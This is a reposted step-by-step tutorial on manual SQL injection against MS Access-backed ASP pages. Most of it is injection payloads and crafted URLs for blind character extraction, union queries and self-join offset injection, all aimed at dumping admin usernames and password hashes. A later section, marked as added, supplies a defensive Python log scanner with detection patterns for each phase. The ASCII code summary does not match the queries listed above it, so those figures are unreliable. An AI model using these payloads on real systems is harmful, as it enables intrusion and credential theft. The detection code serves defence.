[SQL] Manual injection against Access
1) Detecting injection
' produces an error – an injection flaw may exist
and 1=1 returns normally
and 1=2 returns an error – an injection flaw exists
2) Identifying the database
and (select count(*) from msysobjects)>0 – a "permission denied" response means the database is Access
and (select count(*) from sysobjects)>0 – a normal response means the database is MSSQL
3) Guessing table and column names
and exists (select * from table_name) – guess a table name
and exists (select column_name from table_name) – guess a column name
Example:
Check whether a table named admin exists: and exists (select * from admin)
Check whether a column named username exists: and exists (select username from admin)
Check whether a column named password exists: and exists (select password from admin)
4) Guessing the length of the username and password
and (select top 1 len(column_name) from table_name)=X – X is a number; a normal response means the guessed column has that length
Example:
Is the username longer than 0: and (select top 1 len(username) from admin)>0
Is the username longer than 4: and (select top 1 len(username) from admin)>4
Is the username longer than 5: and (select top 1 len(username) from admin)>5
– The username is usually admin: >4 returns normally and >5 returns an error, so its length is 5. The password is usually MD5-hashed, so it is generally 16 or 32 characters long.
5) Guessing the ASCII codes of the username and password
– Use binary search here to be more efficient. ASCII codes run 0-126.
Here we assume the username is admin and the password is admin888; run the guessed ASCII codes through a conversion tool to get the plaintext.
and(select top 1 asc(mid(username,1,1))from admin)>97
and(select top 1 asc(mid(username,1,1))from admin)=97
and(select top 1 asc(mid(username,2,1))from admin)=100
and(select top 1 asc(mid(username,3,1))from admin)=109
and(select top 1 asc(mid(username,4,1))from admin)=105
and(select top 1 asc(mid(username,5,1))from admin)=110
97 100 109 105 110 admin
———————————————————–
and(select top 1 asc(mid(password,1,1))from admin)=52
and(select top 1 asc(mid(password,2,1))from admin)=54
and(select top 1 asc(mid(password,3,1))from admin)=57
and(select top 1 asc(mid(password,4,1))from admin)=56
and(select top 1 asc(mid(password,5,1))from admin)=48
and(select top 1 asc(mid(password,6,1))from admin)=100
and(select top 1 asc(mid(password,7,1))from admin)=51
and(select top 1 asc(mid(password,8,1))from admin)=50
and(select top 1 asc(mid(password,9,1))from admin)=99
and(select top 1 asc(mid(password,10,1))from admin)=48
and(select top 1 asc(mid(password,11,1))from admin)=53
and(select top 1 asc(mid(password,12,1))from admin)=53
and(select top 1 asc(mid(password,13,1))from admin)=57
and(select top 1 asc(mid(password,14,1))from admin)=102
and(select top 1 asc(mid(password,15,1))from admin)=56
and(select top 1 asc(mid(password,16,1))from admin)=32
52 54 57 101 56 48 100 51 50 99 48 53 53 57 102 56 32
469e80d32c0559f8 – the MD5 cracks to admin888
=================== divider ===================
At this point both the username and password are out, and the wretched manual work is done.
But isn't that a bit cumbersome? Apart from tools, there is also the more convenient union query method. Continuing:
1) Union query:
order by X – guess the number of fields (X is a number; an error means the number is too large; keep going until it returns normally, which tells you how many fields there are.)
union select 1,2,3,4,5,6….from table_name – write as many numbers as there are fields; this reveals which field positions are displayed
union select 1,column_name,3,4,5,6 from table_name – dumps the contents of that column; put the column name wherever the displayed position is
Example:
order by 15 error
order by 16 normal – so there are 16 fields
Suppose the table is admin and the columns are username and password.
The constructed statement is:
http:url.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
Fill the column names into the displayed field positions, here assumed to be 6 and 8.
The constructed statement is:
http:url.asp?id=1 union select 1,2,3,4,5,username,7,password,9,10,11,12,13,14,15,16 from admin
=================== divider ===================
At this point the username and password are dumped just the same; simpler, isn't it?
Sometimes a union query reveals the displayed field positions but the column names simply cannot be guessed, and none of the tools can get them; this is where offset injection comes in.
One note first:
the number of fields in the injected query must be greater than or equal to twice the number of columns in the target table.
1) First construct a statement like this: select * from (admin as a inner join admin as b on a.id=b.id)
A few notes:
– * stands for the fields; widening it increases the chance that username and password land in a displayable position
– (admin as a inner join admin as b on a.id=b.id) is a self-join of the admin table
– id is a column; if the id column changes, change it accordingly
– The whole statement means: the admin table is aliased as a and also as b, and the condition is that a's id column equals b's id column, returning all matching rows; obviously a and b are the same table, so of course every row is returned.
An example makes it clearer:
http://url.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
Suppose the table has five columns, then
http://url.asp?id=1 union select 1,2,3,4,5,6,* from (admin as a inner join admin as b on a.id=b.id)
If you are unlucky and it still does not show, then
http://url.asp?id=1 union select 1,2,3,4,5,6,a.id,* from (admin as a inner join admin as b on a.id=b.id)
http://url.asp?id=1 union select 1,2,3,4,5,6,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
Now the ordering of the fields inside * is shuffled, which increases the chance that they show up on the page.
If it still does not show, then
http://url.asp?id=1 union select 1,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
http://url.asp?id=1 union select 1,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
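Added here as a defensive example, not part of the original post: a small Python filter that runs over constructed IIS/W3C-style log lines and flags requests carrying the signatures used in each phase above (the msysobjects/sysobjects fingerprint, `and exists (select`, `len(`, `asc(mid(`, `order by`/`union select`, and the self-join used for offset injection). The sample log, its field layout and the phase names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signature per phase of the walkthrough above, matched against a
# URL-decoded, lower-cased, whitespace-collapsed query string.
PHASES = [
    ("boolean-probe", re.compile(r"\band\s+1\s*=\s*[12]\b")),
    ("db-fingerprint", re.compile(r"select\s+count\(\*\)\s+from\s+(msysobjects|sysobjects)")),
    ("table/column-guess", re.compile(r"\band\s+exists\s*\(\s*select\b")),
    ("length-guess", re.compile(r"select\s+top\s+1\s+len\(")),
    ("char-extraction", re.compile(r"\basc\(\s*mid\(")),
    ("union-probe", re.compile(r"\border\s+by\s+\d+|\bunion\s+select\b")),
    ("offset-injection", re.compile(r"\binner\s+join\s+\w+\s+as\s+\w+\s+on\b")),
]

def normalize(query):
    """Decode twice (catches double URL-encoding), then collapse case and spaces."""
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).lower()

def classify(query):
    """Return the names of all phases whose signature appears in one query string."""
    q = normalize(query)
    return [name for name, rx in PHASES if rx.search(q)]

def scan_log(lines):
    """Return (line_no, cs-uri-stem, phases) for every W3C-style line that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        f = line.split()
        if len(f) < 6 or f[0].startswith("#"):   # skip header and short lines
            continue
        phases = classify(f[5])                # f[4]=cs-uri-stem, f[5]=cs-uri-query
        if phases:
            hits.append((n, f[4], phases))
    return hits

# Constructed sample log (not from the original post), assumed W3C/IIS field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
SAMPLE_LOG = """\
2024-01-01 10:00:00 10.0.0.1 GET /url.asp id=1 80 - 203.0.113.5 Mozilla/5.0 200
2024-01-01 10:00:01 10.0.0.1 GET /url.asp id=1+and+1%3D1 80 - 203.0.113.5 Mozilla/5.0 200
2024-01-01 10:00:02 10.0.0.1 GET /url.asp id=1+and+(select+count(*)+from+msysobjects)%3E0 80 - 203.0.113.5 Mozilla/5.0 500
2024-01-01 10:00:03 10.0.0.1 GET /url.asp id=1+and(select+top+1+asc(mid(username,1,1))from+admin)%3D97 80 - 203.0.113.5 Mozilla/5.0 200
2024-01-01 10:00:04 10.0.0.1 GET /url.asp id=1+union+select+1,2,3,4,5,6,*+from+(admin+as+a+inner+join+admin+as+b+on+a.id%3Db.id) 80 - 203.0.113.5 Mozilla/5.0 200
"""
if __name__ == "__main__":
    for line_no, uri, phases in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {line_no}: {uri} -> {', '.join(phases)}")
```

A single request hitting several phases in sequence from one client IP is the pattern worth alerting on; the fix on the application side is parameterised queries rather than string-built SQL in the .asp page.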
[Note] This article is reposted from: http://sh4dow.lofter.com/post/395c80_1214862